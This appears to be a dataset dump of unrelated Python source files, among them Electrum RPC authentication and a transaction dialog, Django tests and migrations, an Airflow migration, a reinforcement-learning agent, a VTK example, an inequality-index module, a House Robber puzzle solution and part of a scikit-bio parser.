text
stringlengths 2
999k
|
|---|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from base64 import b64decode
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
import time
from . import util
from .logs import logs
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(self):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(self):
try:
self.server.authenticate(self.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
self.send_error(401, str(e))
except Exception as e:
logs.root.exception("")
self.send_error(500, str(e))
return False
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, *args, rpc_user, rpc_password, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
|
from sympy.ntheory import totient
from sys import setrecursionlimit
setrecursionlimit(2000)
def tetrate_mod_n(base, exponent, modulo):
if exponent == 2:
return pow(base, base, modulo)
tot = totient(modulo)
e = tetrate_mod_n(base, exponent - 1, tot)
return pow(base, e, modulo)
print(tetrate_mod_n(1777, 1855, 10**8))
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available tags API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required for retrieving tags"""
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@kudlanov.com',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
res = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@kudlanov.com',
'testpass'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test creating a new tag with invalid payload"""
payload = {'name': ''}
res = self.client.post(TAGS_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Coriander eggs on toast',
time_minutes=10,
price=5.00,
user=self.user
)
recipe.tags.add(tag1)
res = self.client.get(TAGS_URL, {'assigned_only': 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, res.data)
self.assertNotIn(serializer2.data, res.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Pancakes',
time_minutes=5,
price=3.00,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=3,
price=2.00,
user=self.user
)
recipe2.tags.add(tag)
res = self.client.get(TAGS_URL, {'assigned_only': 1})
self.assertEqual(len(res.data), 1)
|
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.distributions import Categorical
import copy
import gym
import environment # lgtm[py/unused-import]
import pyBaba
from tensorboardX import SummaryWriter
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
env = gym.make('baba-volcano-v0')
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
self.conv1 = nn.Conv2d(pyBaba.Preprocess.TENSOR_DIM, 128, 3, padding=1)
self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
self.conv3 = nn.Conv2d(128, 128, 3, padding=1)
self.conv4 = nn.Conv2d(128, 128, 3, padding=1)
self.conv5 = nn.Conv2d(128, 1, 1, padding=0)
self.fc = nn.Linear(594, 4)
self.log_probs = []
self.rewards = []
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = F.relu(self.conv5(x))
x = x.view(x.data.size(0), -1)
x = self.fc(x)
return F.softmax(x, dim=1)
net = Network().to(device)
opt = optim.Adam(net.parameters(), lr=1e-3)
def get_action(state):
state = torch.tensor(state).to(device)
policy = net(state)
m = Categorical(policy)
action = m.sample()
net.log_probs.append(m.log_prob(action))
return env.action_space[action.item()]
def train():
R = 0
loss = []
returns = []
for r in net.rewards[::-1]:
R = r + 0.99 * R
returns.insert(0, R)
returns = torch.tensor(returns)
returns = (returns - returns.mean()) / (returns.std() + 1e-5)
for prob, R in zip(net.log_probs, returns):
loss.append(-prob * R)
opt.zero_grad()
loss = torch.cat(loss).sum()
loss.backward()
opt.step()
del net.log_probs[:]
del net.rewards[:]
if __name__ == '__main__':
writer = SummaryWriter()
global_step = 0
for e in range(10000):
score = 0
state = env.reset().reshape(1, -1, 18, 33)
step = 0
while step < 200:
global_step += 1
action = get_action(state)
env.render()
next_state, reward, done, _ = env.step(action)
next_state = next_state.reshape(1, -1, 18, 33)
net.rewards.append(reward)
score += reward
state = copy.deepcopy(next_state)
step += 1
if env.done:
break
train()
writer.add_scalar('Reward', score, e)
writer.add_scalar('Step', step, e)
print(
f'Episode {e}: score: {score:.3f} time_step: {global_step} step: {step}')
|
#!/usr/bin/env python
# noinspection PyUnresolvedReferences
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.vtkCommonColor import vtkNamedColors
from vtkmodules.vtkCommonDataModel import vtkPolyData
from vtkmodules.vtkFiltersSources import (
vtkPointSource,
vtkSphereSource
)
from vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkGlyph3DMapper,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer
)
def main():
colors = vtkNamedColors()
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName('InteractorStyleTrackballCamera')
# create a renderwindowinteractor
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
style = vtkInteractorStyleTrackballCamera()
iren.SetInteractorStyle(style)
# create source
src = vtkPointSource()
src.SetCenter(0, 0, 0)
src.SetNumberOfPoints(50)
src.SetRadius(5)
src.Update()
actor = point_to_glyph(src.GetOutput().GetPoints(), 0.05)
actor.GetProperty().SetColor(colors.GetColor3d('Gold'))
# assign actor to the renderer
ren.AddActor(actor)
ren.SetBackground(colors.GetColor3d('RoyalBLue'))
# enable user interface interactor
iren.Initialize()
renWin.Render()
iren.Start()
def point_to_glyph(points, scale):
"""
Convert points to glyphs.
:param points: The points to glyph.
:param scale: The scale, used to determine the size of the
glyph representing the point, expressed as a
fraction of the largest side of the bounding
box surrounding the points. e.g. 0.05
:return: The actor.
"""
bounds = points.GetBounds()
max_len = 0.0
for i in range(0, 3):
max_len = max(bounds[i + 1] - bounds[i], max_len)
sphere_source = vtkSphereSource()
sphere_source.SetRadius(scale * max_len)
pd = vtkPolyData()
pd.SetPoints(points)
mapper = vtkGlyph3DMapper()
mapper.SetInputData(pd)
mapper.SetSourceConnection(sphere_source.GetOutputPort())
mapper.ScalarVisibilityOff()
mapper.ScalingOff()
actor = vtkActor()
actor.SetMapper(mapper)
return actor
if __name__ == '__main__':
main()
|
# flake8: noqa
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""add max tries column to task instance
Revision ID: cc1e65623dc7
Revises: 127d2bf2dfa7
Create Date: 2017-06-19 16:53:12.851141
"""
from alembic import op
import sqlalchemy as sa
from airflow import settings
from airflow.models import DagBag
from sqlalchemy import Column, Integer, String
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.ext.declarative import declarative_base
# revision identifiers, used by Alembic.
revision = 'cc1e65623dc7'
down_revision = '127d2bf2dfa7'
branch_labels = None
depends_on = None
Base = declarative_base()
BATCH_SIZE = 5000
ID_LEN = 250
class TaskInstance(Base):
__tablename__ = "task_instance"
task_id = Column(String(ID_LEN), primary_key=True)
dag_id = Column(String(ID_LEN), primary_key=True)
execution_date = Column(sa.DateTime, primary_key=True)
max_tries = Column(Integer)
try_number = Column(Integer, default=0)
def upgrade():
op.add_column('task_instance', sa.Column('max_tries', sa.Integer, server_default="-1"))
# Check if table task_instance exist before data migration. This check is
# needed for database that does not create table until migration finishes.
# Checking task_instance table exists prevent the error of querying
# non-existing task_instance table.
connection = op.get_bind()
inspector = Inspector.from_engine(connection)
tables = inspector.get_table_names()
if 'task_instance' in tables:
# Get current session
sessionmaker = sa.orm.sessionmaker()
session = sessionmaker(bind=connection)
dagbag = DagBag(settings.DAGS_FOLDER)
query = session.query(sa.func.count(TaskInstance.max_tries)).filter(
TaskInstance.max_tries == -1
)
# Separate db query in batch to prevent loading entire table
# into memory and cause out of memory error.
while query.scalar():
tis = session.query(TaskInstance).filter(
TaskInstance.max_tries == -1
).limit(BATCH_SIZE).all()
for ti in tis:
dag = dagbag.get_dag(ti.dag_id)
if not dag or not dag.has_task(ti.task_id):
# task_instance table might not have the up-to-date
# information, i.e dag or task might be modified or
# deleted in dagbag but is reflected in task instance
# table. In this case we do not retry the task that can't
# be parsed.
ti.max_tries = ti.try_number
else:
task = dag.get_task(ti.task_id)
if task.retries:
ti.max_tries = task.retries
else:
ti.max_tries = ti.try_number
session.merge(ti)
session.commit()
# Commit the current session.
session.commit()
def downgrade():
engine = settings.engine
if engine.dialect.has_table(engine, 'task_instance'):
connection = op.get_bind()
sessionmaker = sa.orm.sessionmaker()
session = sessionmaker(bind=connection)
dagbag = DagBag(settings.DAGS_FOLDER)
query = session.query(sa.func.count(TaskInstance.max_tries)).filter(
TaskInstance.max_tries != -1
)
while query.scalar():
tis = session.query(TaskInstance).filter(
TaskInstance.max_tries != -1
).limit(BATCH_SIZE).all()
for ti in tis:
dag = dagbag.get_dag(ti.dag_id)
if not dag or not dag.has_task(ti.task_id):
ti.try_number = 0
else:
task = dag.get_task(ti.task_id)
# max_tries - try_number is number of times a task instance
# left to retry by itself. So the current try_number should be
# max number of self retry (task.retries) minus number of
# times left for task instance to try the task.
ti.try_number = max(0, task.retries - (ti.max_tries -
ti.try_number))
ti.max_tries = -1
session.merge(ti)
session.commit()
session.commit()
op.drop_column('task_instance', 'max_tries')
|
import unittest
from unittest import TestCase
from sqlalchemy.orm.exc import MultipleResultsFound
from wopmars.tests.resource.model.FooBase import FooBase
from wopmars.SQLManager import SQLManager
from wopmars.utils.OptionManager import OptionManager
class TestWopmarsSession(TestCase):
def setUp(self):
OptionManager.initial_test_setup() # Set tests arguments
SQLManager.instance().create_all() # Create database with tables)
self.__session = SQLManager.instance().get_session()
def tearDown(self):
self.__session.rollback()
SQLManager.instance().get_session().close()
SQLManager.instance().drop_all()
OptionManager._drop()
SQLManager._drop()
def test_commit_query_add(self):
for i in range(10):
f = FooBase(name="testSession " + str(i))
self.__session.add(f)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
def test_rollback(self):
for i in range(10):
f = FooBase(name="testSession " + str(i))
self.__session.add(f)
self.__session.rollback()
self.assertEqual(len(self.__session.query(FooBase).all()), 0)
def test_add_all(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
def test_delete(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
for i in range(5):
f = self.__session.query(FooBase).filter(FooBase.name == "testSession " + str(i)).first()
self.__session.delete(f)
self.assertEqual(len(self.__session.query(FooBase).all()), 5)
def test_delete_content(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.__session.delete_content(FooBase)
self.assertEqual(len(self.__session.query(FooBase).all()), 0)
def test_something(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.assertTrue(self.__session.something())
self.__session.commit()
self.assertFalse(self.__session.something())
for i in range(10):
self.__session.query(FooBase).filter(FooBase.name == "testSession " + str(i)).first().name = "sessionTest " + str(i)
self.assertTrue(self.__session.something())
def test_get_or_create(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(self.__session.get_or_create(FooBase, name="testSession 0")[0], fs[0])
self.__session.delete(fs[0])
self.assertNotEqual(self.__session.get_or_create(FooBase, name="testSession 0")[0], fs[0])
def test_query(self):
fs = []
for i in range(10):
fs.append(FooBase(name="testSession " + str(i)))
self.__session.add_all(fs)
self.__session.commit()
self.assertEqual(len(self.__session.query(FooBase).all()), 10)
with self.assertRaises(MultipleResultsFound):
self.assertEqual(self.__session.query(FooBase).one().name, "testSession 0")
self.assertEqual(self.__session.query(FooBase).filter(FooBase.name == "testSession 0").one().name, "testSession 0")
self.assertEqual(self.__session.query(FooBase).count(), 10)
self.assertEqual(self.__session.query(FooBase).first().name, "testSession 0")
self.assertIsNone(self.__session.query(FooBase).filter(FooBase.name == "existepas").one_or_none())
self.assertIsNone(self.__session.query(FooBase).filter(FooBase.name == "existepas").scalar())
self.assertEqual(self.__session.query(FooBase.name).filter(FooBase.name == "testSession 0").scalar(), "testSession 0")
with self.assertRaises(MultipleResultsFound):
self.assertEqual(self.__session.query(FooBase.name).scalar(), "testSession 0")
if __name__ == '__main__':
unittest.main()
|
import numpy as np
def ede(a, epsilon = 0.5, weights = None):
"""
Compute the Atkinson Equally-Distributed Equivalent.
The Atkinson EDE and Index are only suitable for distributions of desirable
quantities (where having more of the quantity is desirable), e.g., income.
Parameters
----------
a : array_like
1-D array containing the values of the distribution.
epsilon : float
The inequality aversion parameter. epsilon > 0.
weights : array_like, optional
1-D array of integer weights associated with the values in `a`. Each value in
`a` contributes to the average according to its associated weight.
If `weights=None`, then all data in `a` are assumed to have a
weight equal to one.
Returns
-------
value : float
Returns the Atkinson EDE of the distribution provided.
"""
sum_atk = 0
if not weights:
N = len(a)
else:
N = weights.sum()
x_mean = np.average(a, weights = weights)
count = 0
for i in a:
if not weights:
sum_atk += i**(1 - epsilon)
else:
sum_atk += (i**(1 - epsilon)) * weights[count]
count += 1
ede = (sum_atk / N)**(1 / (1 - epsilon))
return(ede)
def index(a, epsilon = 0.5, weights = None):
"""
Compute the Atkinson Index.
The Atkinson EDE and Index are only suitable for distributions of desirable
quantities (where having more of the quantity is desirable), e.g., income.
Parameters
----------
a : array_like
1-D array containing the values of the distribution.
epsilon : float
The inequality aversion parameter. epsilon > 0.
weights : array_like, optional
1-D array of integer weights associated with the values in `a`. Each value in
`a` contributes to the average according to its associated weight.
If `weights=None`, then all data in `a` are assumed to have a
weight equal to one.
Returns
-------
value : float
Returns the Atkinson Index of the distribution provided.
"""
ede_atk = ede(a, epsilon, weights)
x_mean = np.average(a, weights = weights)
return(1 - (ede_atk / x_mean))
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (2019) The Electrum Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from typing import TYPE_CHECKING, Optional
import copy
from PyQt5.QtCore import Qt, QSize
from PyQt5.QtGui import QTextCharFormat, QBrush, QFont
from PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QLabel, QGridLayout, QPushButton, QWidget, QTextEdit, QLineEdit, QCheckBox
from electrum.i18n import _
from electrum.util import quantize_feerate, NotEnoughFunds, NoDynamicFeeEstimates
from electrum.plugin import run_hook
from electrum.transaction import TxOutput, Transaction
from electrum.simple_config import SimpleConfig, FEERATE_WARNING_HIGH_FEE
from electrum.wallet import InternalAddressCorruption
from .util import WindowModalDialog, ButtonsLineEdit, ColorScheme, Buttons, CloseButton, FromList, HelpLabel, read_QIcon, char_width_in_lineedit, Buttons, CancelButton, OkButton
from .util import MONOSPACE_FONT
from .fee_slider import FeeSlider
from .history_list import HistoryList, HistoryModel
from .qrtextedit import ShowQRTextEdit
if TYPE_CHECKING:
from .main_window import ElectrumWindow
class TxEditor:
def __init__(self, window: 'ElectrumWindow', make_tx, output_value, is_sweep):
self.main_window = window
self.make_tx = make_tx
self.output_value = output_value
self.tx = None # type: Optional[Transaction]
self.config = window.config
self.wallet = window.wallet
self.not_enough_funds = False
self.no_dynfee_estimates = False
self.needs_update = False
self.password_required = self.wallet.has_keystore_encryption() and not is_sweep
self.main_window.gui_object.timer.timeout.connect(self.timer_actions)
def timer_actions(self):
if self.needs_update:
self.update_tx()
self.update()
self.needs_update = False
def fee_slider_callback(self, dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.needs_update = True
def get_fee_estimator(self):
return None
def update_tx(self):
fee_estimator = self.get_fee_estimator()
try:
self.tx = self.make_tx(fee_estimator)
self.not_enough_funds = False
self.no_dynfee_estimates = False
except NotEnoughFunds:
self.not_enough_funds = True
self.tx = None
return
except NoDynamicFeeEstimates:
self.no_dynfee_estimates = True
self.tx = None
try:
self.tx = self.make_tx(0)
except BaseException:
return
except InternalAddressCorruption as e:
self.tx = None
self.main_window.show_error(str(e))
raise
except BaseException as e:
self.tx = None
self.main_window.logger.exception('')
self.show_message(str(e))
return
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
self.tx.set_rbf(True)
class ConfirmTxDialog(TxEditor, WindowModalDialog):
# set fee and return password (after pw check)
def __init__(self, window: 'ElectrumWindow', make_tx, output_value, is_sweep):
TxEditor.__init__(self, window, make_tx, output_value, is_sweep)
WindowModalDialog.__init__(self, window, _("Confirm Transaction"))
vbox = QVBoxLayout()
self.setLayout(vbox)
grid = QGridLayout()
vbox.addLayout(grid)
self.amount_label = QLabel('')
grid.addWidget(QLabel(_("Amount to be sent") + ": "), 0, 0)
grid.addWidget(self.amount_label, 0, 1)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_label = QLabel('')
grid.addWidget(HelpLabel(_("Mining fee") + ": ", msg), 1, 0)
grid.addWidget(self.fee_label, 1, 1)
self.extra_fee_label = QLabel(_("Additional fees") + ": ")
self.extra_fee_label.setVisible(False)
self.extra_fee_value = QLabel('')
self.extra_fee_value.setVisible(False)
grid.addWidget(self.extra_fee_label, 2, 0)
grid.addWidget(self.extra_fee_value, 2, 1)
self.fee_slider = FeeSlider(self, self.config, self.fee_slider_callback)
self.fee_slider.reinitialize()
grid.addWidget(self.fee_slider, 5, 1)
self.message_label = QLabel(self.default_message())
grid.addWidget(self.message_label, 6, 0, 1, -1)
self.pw_label = QLabel(_('Password'))
self.pw_label.setVisible(self.password_required)
self.pw = QLineEdit()
self.pw.setEchoMode(2)
self.pw.setVisible(self.password_required)
grid.addWidget(self.pw_label, 8, 0)
grid.addWidget(self.pw, 8, 1, 1, -1)
self.preview_button = QPushButton(_('Advanced'))
self.preview_button.clicked.connect(self.on_preview)
grid.addWidget(self.preview_button, 0, 2)
self.send_button = QPushButton(_('Send'))
self.send_button.clicked.connect(self.on_send)
self.send_button.setDefault(True)
vbox.addLayout(Buttons(CancelButton(self), self.send_button))
self.update_tx()
self.update()
self.is_send = False
def default_message(self):
return _('Enter your password to proceed') if self.password_required else _('Click Send to proceed')
def on_preview(self):
self.accept()
def run(self):
cancelled = not self.exec_()
password = self.pw.text() or None
return cancelled, self.is_send, password, self.tx
def on_send(self):
password = self.pw.text() or None
if self.password_required:
if password is None:
return
try:
self.wallet.check_password(password)
except Exception as e:
self.main_window.show_error(str(e), parent=self)
return
self.is_send = True
self.accept()
def disable(self, reason):
self.message_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
self.message_label.setText(reason)
self.pw.setEnabled(False)
self.send_button.setEnabled(False)
def enable(self):
self.message_label.setStyleSheet(None)
self.message_label.setText(self.default_message())
self.pw.setEnabled(True)
self.send_button.setEnabled(True)
def update(self):
tx = self.tx
amount = tx.output_value() if self.output_value == '!' else self.output_value
self.amount_label.setText(self.main_window.format_amount_and_units(amount))
if self.not_enough_funds:
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.main_window.format_amount(c + u + x).strip(), self.main_window.base_unit(), _("are frozen")
)
self.disable(text)
return
if not tx:
return
fee = tx.get_fee()
self.fee_label.setText(self.main_window.format_amount_and_units(fee))
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
self.extra_fee_label.setVisible(True)
self.extra_fee_value.setVisible(True)
self.extra_fee_value.setText(self.main_window.format_amount_and_units(x_fee_amount))
feerate_warning = FEERATE_WARNING_HIGH_FEE
low_fee = fee < self.wallet.relayfee() * tx.estimated_size() / 1000
high_fee = fee > feerate_warning * tx.estimated_size() / 1000
if low_fee:
msg = '\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
])
self.disable(msg)
elif high_fee:
self.disable(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
else:
self.enable()
|
'''
You are a professional robber planning to rob houses along a street.
Each house has a certain amount of money stashed, the only constraint
stopping you from robbing each of them is that adjacent houses
have security system connected and it will automatically contact
the police if two adjacent houses were broken into on the same night.
Given a list of non-negative integers representing the amount of
money of each house, determine the maximum amount of money you can
rob tonight without alerting the police.
Example 1:
Input: [1,2,3,1]
Output: 4
Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).
Total amount you can rob = 1 + 3 = 4.
Example 2:
Input: [2,7,9,3,1]
Output: 12
Explanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).
Total amount you can rob = 2 + 9 + 1 = 12.
'''
class Solution:
def rob(self, nums) -> int:
n = len(nums)
if n == 0:
return 0
dp = [0] * (n+1)
dp[1] = nums[0]
for i in range(2, n+1):
dp[i] = max(nums[i-1]+dp[i-2], dp[i-1])
return dp[-1]
print(Solution().rob([2,7,9,3,1]))
|
# Generated by Django 2.2.6 on 2020-11-06 09:29
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0010_auto_20201103_2339'),
]
operations = [
migrations.AlterModelOptions(
name='group',
options={'ordering': ('title',), 'verbose_name': 'Группа', 'verbose_name_plural': 'Группы'},
),
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-pub_date',), 'verbose_name': 'Пост', 'verbose_name_plural': 'Посты'},
),
]
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from future.utils import viewitems
from numbers import Integral
from copy import deepcopy
from skbio.io import FieldError
def string_and_strip(*items):
"""Converts items to strings and strips them."""
return [str(i).strip() for i in items]
def DelimitedSplitter(delimiter=None, max_splits=1):
"""Returns function that returns stripped fields split by delimiter.
Unlike the default behavior of split, max_splits can be negative, in
which case it counts from the end instead of the start (i.e. splits
at the _last_ delimiter, last two delimiters, etc. for -1, -2, etc.)
However, if the delimiter is None (the default) and max_splits is
negative, will not preserve internal spaces.
Note: leaves empty fields in place.
"""
is_int = isinstance(max_splits, Integral)
if is_int and (max_splits > 0):
def parser(line):
return [i.strip() for i in line.split(delimiter, max_splits)]
elif is_int and (max_splits < 0):
def parser(line):
to_insert = delimiter or ' ' # re-join fields w/ space if None
fields = line.split(delimiter)
if (fields == []) or (fields == ['']):
return [] # empty string or only delimiter: return nothing
# if not enough fields, count from the start, not the end
if len(fields) < max_splits:
first_fields = fields[0]
last_fields = fields[1:]
# otherwise, count off the last n fields and join the remainder
else:
first_fields = fields[:max_splits]
last_fields = fields[max_splits:]
pieces = []
# if first_fields is empty, don't make up an extra empty string
if first_fields:
pieces.append(to_insert.join(first_fields))
pieces.extend(last_fields)
return [i.strip() for i in pieces]
else: # ignore max_splits if it was 0
def parser(line):
return [i.strip() for i in line.split(delimiter)]
return parser
# The following provide examples of the kinds of functions DelimitedSplitter
# returns.
semi_splitter = DelimitedSplitter(';', None)
space_pairs = DelimitedSplitter(None)
equal_pairs = DelimitedSplitter('=')
last_colon = DelimitedSplitter(':', -1)
class GenericRecord(dict):
"""Holds data for a generic field ->: value mapping.
Override Required with {name:prototype} mapping. Each required name
will get a deepcopy of its prototype. For example, use an empty list to
guarantee that each instance has its own list for a particular field to
which items can be appended.
Raises AttributeError on attempt to delete required item, but does not
raise an exception on attempt to delete absent item.
This class explicitly does _not_ override __getitem__ or __setitem__ for
performance reasons: if you need to transform keys on get/set or if you
need to access items as attributes and vice versa, use MappedRecord
instead.
"""
Required = {}
def __init__(self, *args, **kwargs):
"""Reads kwargs as properties of self."""
# perform init on temp dict to preserve interface: will then translate
# aliased keys when loading into self
temp = {}
dict.__init__(temp, *args, **kwargs)
self.update(temp)
for name, prototype in viewitems(self.Required):
if name not in self:
self[name] = deepcopy(prototype)
def __delitem__(self, item):
"""Deletes item or raises exception if item required.
Note: Fails silently if item absent.
"""
if item in self.Required:
